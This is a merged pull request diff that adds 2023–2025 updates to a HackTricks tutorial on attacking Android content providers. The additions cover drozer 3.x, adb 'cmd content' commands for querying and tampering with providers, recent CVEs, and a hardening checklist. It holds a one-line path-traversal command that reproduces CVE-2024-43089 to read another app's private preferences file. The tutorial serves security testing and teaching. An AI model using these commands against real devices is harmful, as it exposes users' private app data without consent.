Merge pull request #1136 from HackTricks-wiki/research_update_src_mobile-pentesting_android-app-pentesting_drozer-tutorial_exploiting-content-providers_20250716_082653

Research Update Enhanced src/mobile-pentesting/android-app-p...

Author: carlospolop

src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md

@@ -191,13 +191,72 @@ Vulnerable Providers:
   content://com.mwr.example.sieve.FileBackupProvider
 ```
 
+## 2023-2025 Updates & Modern Tips
+
+### Drozer 3.x (Python 3) is out
+
+WithSecure resumed maintenance of drozer in 2022 and ported the framework to **Python 3** (latest **3.1.0 – April 2024**).  
+Besides compatibility fixes, new modules that are particularly useful when working with Content Providers include:
+
+* `scanner.provider.exported` – list only providers with `android:exported="true"`.
+* `app.provider.grant` – automatically call `grantUriPermission()` so you can talk to providers that expect `FLAG_GRANT_READ_URI_PERMISSION` / `FLAG_GRANT_WRITE_URI_PERMISSION` on Android 12+.
+* Better handling of **Scoped Storage** so file-based providers on Android 11+ can still be reached.
+
+Upgrade (host & agent):
+
+```bash
+pipx install --force "git+https://github.com/WithSecureLabs/[email protected]"
+adb install drozer-agent-3.1.0.apk
+```
+
+### Using the built-in `cmd content` helper (ADB ≥ 8.0)
+
+All modern Android devices ship with a CLI that can query/update providers **without installing any agent**:
+
+```bash
+adb shell cmd content query  --uri content://com.test.provider/items/
+adb shell cmd content update --uri content://com.test.provider/items/1 \
+      --bind price:d:1337
+adb shell cmd content call   --uri content://com.test.provider  \
+      --method evilMethod --arg 'foo'
+```
+
+Combine it with `run-as <pkg>` or a rooted shell to test internal-only providers.
+
+### Recent real-world CVEs that abused Content Providers
+
+| CVE | Year | Component | Bug class | Impact |
+|-----|------|-----------|-----------|--------|
+| CVE-2024-43089 | 2024 | MediaProvider | Path traversal in `openFile()` | Arbitrary file read from any app’s private storage |
+| CVE-2023-35670 | 2023 | MediaProvider | Path traversal | Information disclosure |
+
+Re-create CVE-2024-43089 on a vulnerable build:
+
+```bash
+adb shell cmd content read \
+  --uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml
+```
+
+### Hardening checklist for API 30+
+
+* Declare `android:exported="false"` unless the provider **must** be public – from API 31 the attribute is mandatory.
+* Enforce **permissions** and/or `android:grantUriPermissions="true"` instead of exporting the whole provider.
+* Whitelist allowed `projection`, `selection` and `sortOrder` arguments (e.g. build queries with `SQLiteQueryBuilder.setProjectionMap`).
+* In `openFile()` canonicalise the requested path (`FileUtils`) and reject `..` sequences to prevent traversal.
+* When exposing files prefer **Storage Access Framework** or a `FileProvider`.
+
+These changes in recent Android versions mean many legacy exploitation primitives still work, but require additional flags/permissions that the updated drozer modules or `cmd content` helper can apply automatically.
+
 ## References
 
 - [https://www.tutorialspoint.com/android/android_content_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm)
 - [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
 - [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)
+- [https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0](https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0)
+- [https://source.android.com/security/bulletin/2024-07-01](https://source.android.com/security/bulletin/2024-07-01)
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 
 
+